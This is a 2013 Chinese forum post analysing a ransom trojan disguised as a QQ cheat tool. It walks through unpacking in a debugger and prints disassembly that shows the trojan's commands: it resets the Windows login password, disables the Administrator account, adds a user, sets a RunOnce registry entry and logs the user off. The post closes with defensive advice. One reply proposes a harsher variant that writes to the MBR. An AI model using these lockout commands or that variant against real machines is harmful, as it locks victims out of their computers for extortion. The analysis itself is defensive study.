敲竹杠木马分析

Asmary · 发表于 2013-12-21 12:33

本帖最后由 Asmary 于 2013-12-21 12:34 编辑

一.基本信息
【报告名称】敲竹杠木马分析
【分析作者】Asmary
【作者邮件】asmary@163.com
【样本名称】刷钻.exe
【样本来源】互联网
【样本类型】恶意木马
【样本文件大小】362,496 字节
【样本文件MD5 校验值】DDB572A20433369821AEF9D0C7704EF9
【样本文件SHA1校验值】3C800E9BD517C05CECE7FB0F15CAF9216A648B89
【加壳信息】UPX 0.89.6 - 1.02 / 1.05 - 1.24 -> Markus & Laszlo
【开发语言】易语言
【可能受到威胁系统:】XP/WIN7
【已知检测名称】敲竹杠木马
【报告日期】2013/12/12
【作者声明】仅为技术交流，如有不妥之处，敬请指出！

二.样本描述
   此类木马近期在国内广泛流行，主要通过网盘，Q群共享文件等传播，木马主要伪装为刷钻、刷Q币、外挂等资源，诱导用户退出安全软件运行，木马运行后会篡改Windows开机密码，并在开机界面提示用户联系QQ获取开机密码，从而敲诈钱财！

三.样本分析
1.首先peid查看壳信息：UPX 0.89.6 - 1.02 / 1.05 - 1.24 -> Markus & Laszlo 节区名：UPX0  UPX1  ，典型的UPX压缩壳，载入OD查分析。
载入后OD停留在：

[AppleScript] 纯文本查看 复制代码

1

2

3

4

5

6

004BA150 > $  60            pushad
004BA151   .  BE 00C04600   mov esi,刷钻.0046C000
004BA156   .  8DBE 0050F9FF lea edi,dword ptr ds:[esi+FFF95000]
004BA15C   .  57            push edi
004BA15D   .  83CD FF       or ebp,FFFFFFFF
004BA160   .  EB 10         jmp short 刷钻.004BA172

2.UPX壳，使用esp定律吧，单步F8后，查看寄存器窗口esp，右键数据窗口跟随，来到数据区，右键选择断点—硬件访问—DWORD断点，F9运行，到跳转处按F8 到OEP处：

[AppleScript] 纯文本查看 复制代码

01

02

03

04

05

06

07

08

09

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

52

53

54

55

56

57

58

59

60

61

62

63

64

65

66

67

68

0044AC07 >  55              push ebp                                          ; 程序OEP  
0044AC08    8BEC            mov ebp,esp
0044AC0A    6A FF           push -1
0044AC0C    68 00414700     push 刷钻.00474100
0044AC11    68 84D44400     push 刷钻.0044D484
0044AC16    64:A1 00000000  mov eax,dword ptr fs:[0]
0044AC1C    50              push eax
0044AC1D    64:8925 0000000>mov dword ptr fs:[0],esp
0044AC24    83EC 58         sub esp,58
0044AC27    53              push ebx
0044AC28    56              push esi
0044AC29    57              push edi
0044AC2A    8965 E8         mov dword ptr ss:[ebp-18],esp
0044AC2D    FF15 90D14600   call dword ptr ds:[<&kernel32.GetVersion>]        ; kernel32.GetVersion
0044AC33    33D2            xor edx,edx
0044AC35    8AD4            mov dl,ah
0044AC37    8915 ACC04A00   mov dword ptr ds:[4AC0AC],edx
0044AC3D    8BC8            mov ecx,eax
0044AC3F    81E1 FF000000   and ecx,0FF
0044AC45    890D A8C04A00   mov dword ptr ds:[4AC0A8],ecx
0044AC4B    C1E1 08         shl ecx,8
0044AC4E    03CA            add ecx,edx
0044AC50    890D A4C04A00   mov dword ptr ds:[4AC0A4],ecx
0044AC56    C1E8 10         shr eax,10
0044AC59    A3 A0C04A00     mov dword ptr ds:[4AC0A0],eax
0044AC5E    6A 01           push 1
0044AC60    E8 8B4C0000     call 刷钻.0044F8F0          ;易语言入口特征
0044AC65    59              pop ecx
0044AC66    85C0            test eax,eax
0044AC68    75 08           jnz short 刷钻.0044AC72
0044AC6A    6A 1C           push 1C
0044AC6C    E8 C3000000     call 刷钻.0044AD34
0044AC71    59              pop ecx
0044AC72    E8 364A0000     call 刷钻.0044F6AD
0044AC77    85C0            test eax,eax
0044AC79    75 08           jnz short 刷钻.0044AC83
0044AC7B    6A 10           push 10
0044AC7D    E8 B2000000     call 刷钻.0044AD34
0044AC82    59              pop ecx
0044AC83    33F6            xor esi,esi
0044AC85    8975 FC         mov dword ptr ss:[ebp-4],esi
0044AC88    E8 64480000     call 刷钻.0044F4F1
0044AC8D    FF15 14D34600   call dword ptr ds:[<&kernel32.GetCommandLineA>]   ; kernel32.GetCommandLineA
0044AC93    A3 C4D84A00     mov dword ptr ds:[4AD8C4],eax
0044AC98    E8 22470000     call 刷钻.0044F3BF
0044AC9D    A3 68C04A00     mov dword ptr ds:[4AC068],eax
0044ACA2    E8 CB440000     call 刷钻.0044F172
0044ACA7    E8 0D440000     call 刷钻.0044F0B9
0044ACAC    E8 35350000     call 刷钻.0044E1E6
0044ACB1    8975 D0         mov dword ptr ss:[ebp-30],esi
0044ACB4    8D45 A4         lea eax,dword ptr ss:[ebp-5C]
0044ACB7    50              push eax
0044ACB8    FF15 A8D14600   call dword ptr ds:[<&kernel32.GetStartupInfoA>]   ; kernel32.GetStartupInfoA
0044ACBE    E8 9E430000     call 刷钻.0044F061
0044ACC3    8945 9C         mov dword ptr ss:[ebp-64],eax
0044ACC6    F645 D0 01      test byte ptr ss:[ebp-30],1
0044ACCA    74 06           je short 刷钻.0044ACD2
0044ACCC    0FB745 D4       movzx eax,word ptr ss:[ebp-2C]
0044ACD0    EB 03           jmp short 刷钻.0044ACD5
0044ACD2    6A 0A           push 0A
0044ACD4    58              pop eax
0044ACD5    50              push eax
0044ACD6    FF75 9C         push dword ptr ss:[ebp-64]
0044ACD9    56              push esi
0044ACDA    56              push esi
0044ACDB    FF15 08D34600   call dword ptr ds:[<&kernel32.GetModuleHandleA>]  ; kernel32.GetModuleHandleA
0044ACE1    50              push eax
0044ACE2    E8 870D0100     call 刷钻.0045BA6E          ; Winmain函数入口点

3.以上是程序初始化操作，例如：获取系统版本号、初始化堆栈空间、获取进程启动信息等！跳过程序初始化操作，主要看Winmain函数，该函数一般有4个参数，其中最后一个参数为当前实例句柄，而这个参数一般通过GetModuleHandleA函数来获得，所以很容易找到Winmain函数入口点0044ACE2 F7跟进去查看：

[AppleScript] 纯文本查看 复制代码

1

2

3

4

5

6

0045BA6E    FF7424 10       push dword ptr ss:[esp+10]                        ; 窗口的显示模式
0045BA72    FF7424 10       push dword ptr ss:[esp+10]                        ; 命令行指针
0045BA76    FF7424 10       push dword ptr ss:[esp+10]                        ; 默认值为0
0045BA7A    FF7424 10       push dword ptr ss:[esp+10]                        ; 当前实例句柄
0045BA7E    E8 92840000     call 刷钻.00463F15
0045BA83    C2 1000         retn 10

4.Winmain函数的4个参数，跳过，F8到0045BA7E 然后F7跟进:

[AppleScript] 纯文本查看 复制代码

01

02

03

04

05

06

07

08

09

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

00463F15    53              push ebx
00463F16    56              push esi
00463F17    57              push edi
00463F18    83CB FF         or ebx,FFFFFFFF
00463F1B    E8 5CEDFFFF     call 刷钻.00462C7C         
00463F20    8BF0            mov esi,eax                                       
00463F22    E8 61340000     call 刷钻.00467388  
00463F27    FF7424 1C       push dword ptr ss:[esp+1C]
00463F2B    8B78 04         mov edi,dword ptr ds:[eax+4]
00463F2E    FF7424 1C       push dword ptr ss:[esp+1C]
00463F32    FF7424 1C       push dword ptr ss:[esp+1C]
00463F36    FF7424 1C       push dword ptr ss:[esp+1C]
00463F3A    E8 28420000     call 刷钻.00468167         
00463F3F    85C0            test eax,eax                                      
00463F41    74 3B           je short 刷钻.00463F7E
00463F43    85FF            test edi,edi
00463F45    74 0E           je short 刷钻.00463F55
00463F47    8B07            mov eax,dword ptr ds:[edi]
00463F49    8BCF            mov ecx,edi
00463F4B    FF90 84000000   call dword ptr ds:[eax+84]
00463F51    85C0            test eax,eax                                      
00463F53    74 29           je short 刷钻.00463F7E
00463F55    8B06            mov eax,dword ptr ds:[esi]
00463F57    8BCE            mov ecx,esi
00463F59    FF50 50         call dword ptr ds:[eax+50]

5.上面主要是线程存储，设置错误模式等，跳过，F8到00463F59后，然后F7跟进:

[AppleScript] 纯文本查看 复制代码

01

02

03

04

05

06

07

08

09

10

11

12

13

14

15

16

17

18

19

20

0040B660    55              push ebp
0040B661    8BEC            mov ebp,esp
0040B663    51              push ecx                                
0040B664    53              push ebx
0040B665    56              push esi                                 
0040B666    8BF1            mov esi,ecx                              
0040B668    57              push edi                                
0040B669    8B4E 68         mov ecx,dword ptr ds:[esi+68]            
0040B66C    8D86 D8000000   lea eax,dword ptr ds:[esi+D8]
0040B672    50              push eax                                 
0040B673    51              push ecx                                
0040B674    E8 577C0000     call 刷钻.004132D0
0040B679    83C4 08         add esp,8
0040B67C    8D8E 90030000   lea ecx,dword ptr ds:[esi+390]
0040B682    68 02104000     push 刷钻.00401002
0040B687    68 00104000     push 刷钻.00401000
0040B68C    68 00104000     push 刷钻.00401000
0040B691    E8 4A470100     call 刷钻.0041FDE0
0040B696    60              pushad
0040B697    E8 625FFFFF     call 刷钻.004015FE

6.线程堆栈初始化等操作，跳过，继续F8单步到0040B697 后，F7跟进：

[AppleScript] 纯文本查看 复制代码

01

02

03

04

05

06

07

08

09

10

11

12

13

004015FE    B8 06000000     mov eax,6
00401603    E8 2D000000     call 刷钻.00401635
00401608    FC              cld
00401609    DBE3            finit
0040160B    E8 EDFFFFFF     call 刷钻.004015FD
00401610    68 D6154000     push 刷钻.004015D6
00401615    B8 03000000     mov eax,3
0040161A    E8 16000000     call 刷钻.00401635
0040161F    83C4 04         add esp,4
00401622    E8 A4FAFFFF     call 刷钻.004010CB
00401627    E8 03000000     call 刷钻.0040162F
0040162C    33C0            xor eax,eax                              
0040162E    C3              retn

7.加载窗口资源，设置进程操作目录，初始化，等操作，忽略，继续F8单步到00401622后，F7跟进
下面就是分析的主题部分：

[AppleScript] 纯文本查看 复制代码

001

002

003

004

005

006

007

008

009

010

011

012

013

014

015

016

017

018

019

020

021

022

023

024

025

026

027

028

029

030

031

032

033

034

035

036

037

038

039

040

041

042

043

044

045

046

047

048

049

050

051

052

053

054

055

056

057

058

059

060

061

062

063

064

065

066

067

068

069

070

071

072

073

074

075

076

077

078

079

080

081

082

083

084

085

086

087

088

089

090

091

092

093

094

095

096

097

098

099

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

133

134

135

136

137

138

139

140

141

142

143

144

145

146

147

148

149

150

151

152

153

154

004010CB    55              push ebp                                
004010CC    8BEC            mov ebp,esp                              
004010CE    81EC 0C000000   sub esp,0C                               
004010D4    68 3C000000     push 3C                                 
004010D9    E8 6F050000     call 刷钻.0040164D                        
004010DE    83C4 04         add esp,4                               
004010E1    8945 FC         mov dword ptr ss:[ebp-4],eax             
004010E4    8BD8            mov ebx,eax
004010E6    8BF8            mov edi,eax
004010E8    33C0            xor eax,eax                              
004010EA    B9 0F000000     mov ecx,0F                               
004010EF    F3:AB           rep stos dword ptr es:[edi]              
004010F1    83C3 08         add ebx,8
004010F4    B8 00000000     mov eax,0
004010F9    8903            mov dword ptr ds:[ebx],eax
004010FB    83C3 14         add ebx,14
004010FE    B8 00000000     mov eax,0
00401103    8903            mov dword ptr ds:[ebx],eax
00401105    83C3 08         add ebx,8
00401108    B8 00000000     mov eax,0
0040110D    8903            mov dword ptr ds:[ebx],eax
0040110F    68 04000200     push 20004
00401114    6A 00           push 0
00401116    FF75 FC         push dword ptr ss:[ebp-4]
00401119    68 01000000     push 1
0040111E    B8 01000000     mov eax,1                               ;忽略，以上主要是：保护现场，开辟初始化局部空间，变量初始化操作等
00401123    BB B0384400     mov ebx,刷钻.004438B0
00401128    E8 1A050000     call 刷钻.00401647                              ; 获取用户名 系统目录等
0040112D    83C4 10         add esp,10
00401130    B8 50E74600     mov eax,刷钻.0046E750                      ; 用户名：联系QQ78111975解锁
00401135    50              push eax
00401136    8B1D 18DF4800   mov ebx,dword ptr ds:[48DF18]              
0040113C    85DB            test ebx,ebx
0040113E    74 09           je short 刷钻.00401149
00401140    53              push ebx
00401141    E8 F5040000     call 刷钻.0040163B
00401146    83C4 04         add esp,4
00401149    58              pop eax                                    
0040114A    A3 18DF4800     mov dword ptr ds:[48DF18],eax
0040114F    B8 63E74600     mov eax,刷钻.0046E763                      ; 密码：admintiejiu520
00401154    50              push eax
00401155    8B1D 1CDF4800   mov ebx,dword ptr ds:[48DF1C]              
0040115B    85DB            test ebx,ebx
0040115D    74 09           je short 刷钻.00401168
0040115F    53              push ebx
00401160    E8 D6040000     call 刷钻.0040163B
00401165    83C4 04         add esp,4
00401168    58              pop eax                                    
00401169    A3 1CDF4800     mov dword ptr ds:[48DF1C],eax
0040116E    FF35 1CDF4800   push dword ptr ds:[48DF1C]                
00401174    68 72E74600     push 刷钻.0046E772                         ; net user %username%
00401179    B9 02000000     mov ecx,2
0040117E    E8 ECFEFFFF     call 刷钻.0040106F                         ; net命令连接密码
00401183    83C4 08         add esp,8
00401186    8945 F8         mov dword ptr ss:[ebp-8],eax
00401189    68 01030080     push 80000301
0040118E    6A 00           push 0
00401190    68 01000000     push 1
00401195    68 02000080     push 80000002
0040119A    6A 00           push 0
0040119C    68 00000000     push 0
004011A1    68 04000080     push 80000004
004011A6    6A 00           push 0
004011A8    8B45 F8         mov eax,dword ptr ss:[ebp-8]
004011AB    85C0            test eax,eax
004011AD    75 05           jnz short 刷钻.004011B4
004011AF    B8 87E74600     mov eax,刷钻.0046E787
004011B4    50              push eax
004011B5    68 03000000     push 3
004011BA    BB 90174000     mov ebx,刷钻.00401790
004011BF    E8 7D040000     call 刷钻.00401641                         ; 修改开机密码
004011C4    83C4 28         add esp,28
004011C7    8B5D F8         mov ebx,dword ptr ss:[ebp-8]
004011CA    85DB            test ebx,ebx
004011CC    74 09           je short 刷钻.004011D7
004011CE    53              push ebx
004011CF    E8 67040000     call 刷钻.0040163B
004011D4    83C4 04         add esp,4
004011D7    68 1CDF4800     push 刷钻.0048DF1C
004011DC    E8 24020000     call 刷钻.00401405                         ; 禁用账户
004011E1    68 1CDF4800     push 刷钻.0048DF1C
004011E6    68 18DF4800     push 刷钻.0048DF18
004011EB    E8 E5020000     call 刷钻.004014D5                         ; 创建用户
004011F0    68 88E74600     push 刷钻.0046E788                         ;  /del\r\ndel C:\Program Files\\1.bat
004011F5    FF35 18DF4800   push dword ptr ds:[48DF18]               
004011FB    68 ABE74600     push 刷钻.0046E7AB                         ; net user
00401200    B9 03000000     mov ecx,3
00401205    E8 65FEFFFF     call 刷钻.0040106F
0040120A    83C4 0C         add esp,0C
0040120D    8945 F8         mov dword ptr ss:[ebp-8],eax
00401210    68 04000080     push 80000004
00401215    6A 00           push 0
00401217    8B45 F8         mov eax,dword ptr ss:[ebp-8]
0040121A    85C0            test eax,eax
0040121C    75 05           jnz short 刷钻.00401223
0040121E    B8 87E74600     mov eax,刷钻.0046E787
00401223    50              push eax
00401224    68 01000000     push 1
00401229    BB 10194000     mov ebx,刷钻.00401910
0040122E    E8 0E040000     call 刷钻.00401641
00401233    83C4 10         add esp,10
00401236    8945 F4         mov dword ptr ss:[ebp-C],eax
00401239    8B5D F8         mov ebx,dword ptr ss:[ebp-8]
0040123C    85DB            test ebx,ebx
0040123E    74 09           je short 刷钻.00401249
00401240    53              push ebx
00401241    E8 F5030000     call 刷钻.0040163B
00401246    83C4 04         add esp,4
00401249    68 05000080     push 80000005
0040124E    6A 00           push 0
00401250    8B45 F4         mov eax,dword ptr ss:[ebp-C]
00401253    85C0            test eax,eax
00401255    75 05           jnz short 刷钻.0040125C
00401257    B8 B5E74600     mov eax,刷钻.0046E7B5
0040125C    50              push eax
0040125D    68 04000080     push 80000004
00401262    6A 00           push 0
00401264    68 BDE74600     push 刷钻.0046E7BD                     ; C:\Program Files\1.bat
00401269    68 02000000     push 2
0040126E    BB C0194000     mov ebx,刷钻.004019C0
00401273    E8 C9030000     call 刷钻.00401641                         ; 创建并运行1.bat
00401278    83C4 1C         add esp,1C
0040127B    8B5D F4         mov ebx,dword ptr ss:[ebp-C]
0040127E    85DB            test ebx,ebx
00401280    74 09           je short 刷钻.0040128B
00401282    53              push ebx
00401283    E8 B3030000     call 刷钻.0040163B
00401288    83C4 04         add esp,4
0040128B    68 04000080     push 80000004
00401290    6A 00           push 0
00401292    68 BDE74600     push 刷钻.0046E7BD                         ; C:\Program Files\1.bat
00401297    68 04000080     push 80000004
0040129C    6A 00           push 0
0040129E    68 D4E74600     push 刷钻.0046E7D4    ;SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\MicrosoftWindows
004012A3    68 01030080     push 80000301
004012A8    6A 00           push 0
004012AA    68 04000000     push 4
004012AF    68 03000000     push 3
004012B4    BB A01D4000     mov ebx,刷钻.00401DA0
004012B9    E8 83030000     call 刷钻.00401641                         ; 注册表操作
004012BE    83C4 28         add esp,28
004012C1    E8 95020000     call 刷钻.0040155B
004012C6    68 01030080     push 80000301
004012CB    6A 00           push 0
004012CD    68 01000000     push 1
004012D2    68 02000080     push 80000002
004012D7    6A 00           push 0
004012D9    68 00000000     push 0
004012DE    68 04000080     push 80000004
004012E3    6A 00           push 0
004012E5    68 17E84600     push 刷钻.0046E817                         ; shutdown -l
004012EA    68 03000000     push 3
004012EF    BB 90174000     mov ebx,刷钻.00401790
004012F4    E8 48030000     call 刷钻.00401641                         ; 注销机器

8.分别跟进各个行为具体操作：
修改开机密码：

[AppleScript] 纯文本查看 复制代码

01

02

03

04

05

06

07

08

09

10

11

00401836    50              push eax[/color]
[color=#000000]00401837    51              push ecx[/color]
[color=#000000]00401838    6A 00           push 0[/color]
[color=#000000]0040183A    6A 00           push 0[/color]
[color=#000000]0040183C    6A 00           push 0[/color]
[color=#000000]0040183E    6A 00           push 0[/color]
[color=#000000]00401840    6A 00           push 0[/color]
[color=#000000]00401842    6A 00           push 0[/color]
[color=#000000]00401844    52              push edx                                   ; net user %username% admintiejiu520[/color]
[color=#000000]00401845    6A 00           push 0[/color]
[color=#000000]00401847    FF15 1CD34600   call dword ptr ds:[<&kernel32.CreateProc>  ; kernel32.CreateProcessA

禁用账户：

[AppleScript] 纯文本查看 复制代码

01

02

03

04

05

06

07

08

09

10

11

12

0040140E    68 01030080     push 80000301[/color]
[color=#000000]00401413    6A 00           push 0[/color]
[color=#000000]00401415    68 01000000     push 1[/color]
[color=#000000]0040141A    68 02000080     push 80000002[/color]
[color=#000000]0040141F    6A 00           push 0[/color]
[color=#000000]00401421    68 01000000     push 1[/color]
[color=#000000]00401426    68 04000080     push 80000004[/color]
[color=#000000]0040142B    6A 00           push 0[/color]
[color=#000000]0040142D    68 23E84600     push 刷钻.0046E823                         ; net user Administrator /active:no[/color]
[color=#000000]00401432    68 03000000     push 3[/color]
[color=#000000]00401437    BB 90174000     mov ebx,刷钻.00401790[/color]
[color=#000000]0040143C    E8 00020000     call 刷钻.00401641

创建账户：

[AppleScript] 纯文本查看 复制代码

01

02

03

04

05

06

07

08

09

10

00401836    50              push eax[/color]
[color=#000000]00401837    51              push ecx[/color]
[color=#000000]00401838    6A 00           push 0[/color]
[color=#000000]0040183A    6A 00           push 0[/color]
[color=#000000]0040183C    6A 00           push 0[/color]
[color=#000000]0040183E    6A 00           push 0[/color]
[color=#000000]00401840    6A 00           push 0[/color]
[color=#000000]00401842    6A 00           push 0[/color]
[color=#000000]00401844    52              push edx                                   ; net user 联系QQ78111975解锁 admintiejiu520 /add[/color]
[color=#000000]00401845    6A 00           push 000401847 FF15 1CD34600 call dword ptr ds:[<&kernel32.CreateProc> ; kernel32.CreateProcessA

批处理操作：

[AppleScript] 纯文本查看 复制代码

01

02

03

04

05

06

07

08

09

10

11

0045E74D    6A 03           push 3[/color]
[color=#000000]0045E74F    5F              pop edi                                  [/color]
[color=#000000]0045E750    6A 00           push 0[/color]
[color=#000000]0045E752    68 80000000     push 80[/color]
[color=#000000]0045E757    8D55 F4         lea edx,dword ptr ss:[ebp-C][/color]
[color=#000000]0045E75A    57              push edi[/color]
[color=#000000]0045E75B    52              push edx[/color]
[color=#000000]0045E75C    50              push eax[/color]
[color=#000000]0045E75D    51              push ecx[/color]
[color=#000000]0045E75E    FF75 08         push dword ptr ss:[ebp+8]                  ; C:\Program Files\1.bat[/color]
[color=#000000]0045E761    FF15 6CD24600   call dword ptr ds:[<&kernel32.CreateFile>  ; kernel32.CreateFileA

注册表操作：

[AppleScript] 纯文本查看 复制代码

01

02

03

04

05

06

07

08

09

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

52

53

54

55

56

57

58

59

60

61

62

63

64

65

66

67

68

69

70

71

72

73

74

75

76

77

78

79

80

81

82

83

84

85

86

87

88

89

00401C84    52              push edx[/color]
[color=#000000]00401C85    68 06000200     push 20006                                 [/color]
[color=#000000]00401C8A    6A 00           push 0[/color]
[color=#000000]00401C8C    8D348F          lea esi,dword ptr ds:[edi+ecx*4][/color]
[color=#000000]00401C8F    8B4C24 1C       mov ecx,dword ptr ss:[esp+1C][/color]
[color=#000000]00401C93    50              push eax                                   [/color]
[color=#000000]00401C94    51              push ecx                                  [/color]
[color=#000000]00401C95    C703 00000000   mov dword ptr ds:[ebx],0  [/color]
[color=#000000]00401C9B    FF15 04D04600   call dword ptr ds:[<&ADVAPI32.RegOpenKey>; advapi32.RegOpenKeyExA     打开[/color]
[color=#000000]00401CA1    85C0            test eax,eax[/color]
[color=#000000]00401CA3    74 1D           je short 刷钻.00401CC2                     [/color]
[color=#000000]00401CA5    8B4424 0C       mov eax,dword ptr ss:[esp+C][/color]
[color=#000000]00401CA9    8B4C24 10       mov ecx,dword ptr ss:[esp+10][/color]
[color=#000000]00401CAD    8D5424 30       lea edx,dword ptr ss:[esp+30][/color]
[color=#000000]00401CB1    52              push edx[/color]
[color=#000000]00401CB2    50              push eax                                  [/color]
[color=#000000]00401CB3    51              push ecx                                   [/color]
[color=#000000]00401CB4    FF15 0CD04600   call dword ptr ds:[<&ADVAPI32.RegCreateK>  ; advapi32.RegCreateKeyA    创建[/color]
[color=#000000]00401CBA    85C0            test eax,eax  [/color]
[color=#000000]00401CBC    0F85 B9000000   jnz 刷钻.00401D7B[/color]
[color=#000000]00401CC2    8B56 08         mov edx,dword ptr ds:[esi+8][/color]
[color=#000000]00401CC5    52              push edx[/color]
[color=#000000]00401CC6    E8 65860000     call 刷钻.0040A330[/color]
[color=#000000]00401CCB    83C4 04         add esp,4[/color]
[color=#000000]00401CCE    85C0            test eax,eax[/color]
[color=#000000]00401CD0    8B46 08         mov eax,dword ptr ds:[esi+8][/color]
[color=#000000]00401CD3    74 3D           je short 刷钻.00401D12[/color]
[color=#000000]00401CD5    3D 01030080     cmp eax,80000301[/color]
[color=#000000]00401CDA    75 04           jnz short 刷钻.00401CE0[/color]
[color=#000000]00401CDC    8B06            mov eax,dword ptr ds:[esi][/color]
[color=#000000]00401CDE    EB 0D           jmp short 刷钻.00401CED[/color]
[color=#000000]00401CE0    6A 00           push 0[/color]
[color=#000000]00401CE2    56              push esi                                 [/color]
[color=#000000]00401CE3    68 D1070000     push 7D1[/color]
[color=#000000]00401CE8    E8 13DB0000     call 刷钻.0040F800[/color]
[color=#000000]00401CED    8B5424 2C       mov edx,dword ptr ss:[esp+2C]            [/color]
[color=#000000]00401CF1    8D4C24 24       lea ecx,dword ptr ss:[esp+24][/color]
[color=#000000]00401CF5    6A 04           push 4[/color]
[color=#000000]00401CF7    51              push ecx                                 [/color]
[color=#000000]00401CF8    894424 2C       mov dword ptr ss:[esp+2C],eax[/color]
[color=#000000]00401CFC    8B4424 38       mov eax,dword ptr ss:[esp+38][/color]
[color=#000000]00401D00    6A 04           push 4[/color]
[color=#000000]00401D02    6A 00           push 0[/color]
[color=#000000]00401D04    52              push edx[/color]
[color=#000000]00401D05    50              push eax[/color]
[color=#000000]00401D06    FF15 08D04600   call dword ptr ds:[<&ADVAPI32.RegSetValu>; advapi32.RegSetValueExA     设置[/color]
[color=#000000]00401D0C    85C0            test eax,eax[/color]
[color=#000000]00401D0E    75 60           jnz short 刷钻.00401D70[/color]
[color=#000000]00401D10    EB 58           jmp short 刷钻.00401D6A[/color]
[color=#000000]00401D12    3D 04000080     cmp eax,80000004[/color]
[color=#000000]00401D17    75 28           jnz short 刷钻.00401D41                   [/color]
[color=#000000]00401D19    8B36            mov esi,dword ptr ds:[esi][/color]
[color=#000000]00401D1B    83C9 FF         or ecx,FFFFFFFF[/color]
[color=#000000]00401D1E    8BFE            mov edi,esi                             [/color]
[color=#000000]00401D20    33C0            xor eax,eax[/color]
[color=#000000]00401D22    F2:AE           repne scas byte ptr es:[edi][/color]
[color=#000000]00401D24    8B5424 30       mov edx,dword ptr ss:[esp+30][/color]
[color=#000000]00401D28    F7D1            not ecx                                 [/color]
[color=#000000]00401D2A    51              push ecx                                [/color]
[color=#000000]00401D2B    8B4C24 30       mov ecx,dword ptr ss:[esp+30][/color]
[color=#000000]00401D2F    56              push esi                                 [/color]
[color=#000000]00401D30    6A 01           push 1[/color]
[color=#000000]00401D32    50              push eax[/color]
[color=#000000]00401D33    51              push ecx                                 [/color]
[color=#000000]00401D34    52              push edx[/color]
[color=#000000]00401D35    FF15 08D04600   call dword ptr ds:[<&ADVAPI32.RegSetValu>; advapi32.RegSetValueExA    设置[/color]
[color=#000000]00401D3B    85C0            test eax,eax[/color]
[color=#000000]00401D3D    75 31           jnz short 刷钻.00401D70[/color]
[color=#000000]00401D3F    EB 29           jmp short 刷钻.00401D6A[/color]
[color=#000000]00401D41    3D 05000080     cmp eax,80000005[/color]
[color=#000000]00401D46    75 28           jnz short 刷钻.00401D70[/color]
[color=#000000]00401D48    8B36            mov esi,dword ptr ds:[esi][/color]
[color=#000000]00401D4A    8B4C24 2C       mov ecx,dword ptr ss:[esp+2C]           [/color]
[color=#000000]00401D4E    8B5424 30       mov edx,dword ptr ss:[esp+30][/color]
[color=#000000]00401D52    8B46 04         mov eax,dword ptr ds:[esi+4][/color]
[color=#000000]00401D55    83C6 08         add esi,8[/color]
[color=#000000]00401D58    50              push eax[/color]
[color=#000000]00401D59    56              push esi                                 [/color]
[color=#000000]00401D5A    6A 03           push 3[/color]
[color=#000000]00401D5C    6A 00           push 0[/color]
[color=#000000]00401D5E    51              push ecx                                 [/color]
[color=#000000]00401D5F    52              push edx[/color]
[color=#000000]00401D60    FF15 08D04600   call dword ptr ds:[<&ADVAPI32.RegSetValu>; advapi32.RegSetValueExA     设置[/color]
[color=#000000]00401D66    85C0            test eax,eax[/color]
[color=#000000]00401D68    75 06           jnz short 刷钻.00401D70[/color]
[color=#000000]00401D6A    C703 01000000   mov dword ptr ds:[ebx],1[/color]
[color=#000000]00401D70    8B4424 30       mov eax,dword ptr ss:[esp+30][/color]
[color=#000000]00401D74    50              push eax[/color]
[color=#000000]00401D75    FF15 00D04600   call dword ptr ds:[<&ADVAPI32.RegCloseKe>; advapi32.RegCloseKey    关闭

注销计算机：

[AppleScript] 纯文本查看 复制代码

01

02

03

04

05

06

07

08

09

10

11

00401836    50              push eax[/color]
[color=#000000]00401837    51              push ecx[/color]
[color=#000000]00401838    6A 00           push 0[/color]
[color=#000000]0040183A    6A 00           push 0[/color]
[color=#000000]0040183C    6A 00           push 0[/color]
[color=#000000]0040183E    6A 00           push 0[/color]
[color=#000000]00401840    6A 00           push 0[/color]
[color=#000000]00401842    6A 00           push 0[/color]
[color=#000000]00401844    52              push edx                                   ; shutdown -l   注销计算机[/color]
[color=#000000]00401845    6A 00           push 0[/color]
[color=#000000]00401847    FF15 1CD34600   call dword ptr ds:[<&kernel32.CreateProc>  ; kernel32.CreateProcessA

四.分析结论
主要使用CreateProcess函数来执行一些列操作，如:修改密码，禁用用户，创建新用户，生成批处理文件，注册表启动，注销计算机等。

五.防御建议
1.尽量不使用administrator作为默认登录用户，此类木马貌似只对Administrator有效（部分木马样本）
2.最好的防御方法就是在本地计算机启用两个管理员帐号，这样即使当前账户被锁，也可以使用另一个账户恢复原账户，删除木马新建账户，删除相应注册表和批处理文件！
3.已中木马的用户，可使用例如老毛桃等PE工具重置密码！保持良好上网习惯，切勿运行陌生程序，安装安全软件等

243201119 · 发表于 2013-12-21 12:40

看来有空还是要弄两个管理员才行

专卖小七 · 发表于 2013-12-21 12:52

最近真是大牛辈出啊。。。。

夜的静night · 发表于 2013-12-21 12:49

呵呵来支持来了啊听说过这个玩意

hft八宝粥 · 发表于 2013-12-21 12:44

看不懂啊

L4Nce · 发表于 2013-12-21 12:40

这样的敲法不够彻底饿，能诱使用户退杀软的话，直接写入mbr。在mbr部分写个验证，强行重启即可。
由此改进了此方法的各种缺点

叼烟的声音 · 发表于 2013-12-21 13:21

很详细，我竟然看完了!

944688504 · 发表于 2013-12-21 12:53

一直在找很邪恶。。

文艺委员 · 发表于 2013-12-21 12:55

有没有源码啊

948413534 · 发表于 2013-12-21 12:59

这个太无耻了吧，稍微懂点电脑的就搞定了

scblue · 发表于 2013-12-21 13:01

这个好狠...还好我U盘常备PE。只要不随意打开来路不明的文件应该就没事吧？话说遇到这事能 llo么？

帐号		自动登录	找回密码
密码			注册[Register]

[PC样本分析] 敲竹杠木马分析

免费评分

回帖奖励 +1 CB吾爱币

回帖奖励 +1 CB吾爱币

回帖奖励 +1 CB吾爱币

回帖奖励 +1 CB吾爱币

回帖奖励 +1 CB吾爱币

点评

回帖奖励 +1 CB吾爱币

回帖奖励 +1 CB吾爱币

回帖奖励 +1 CB吾爱币

回帖奖励 +1 CB吾爱币

回帖奖励 +1 CB吾爱币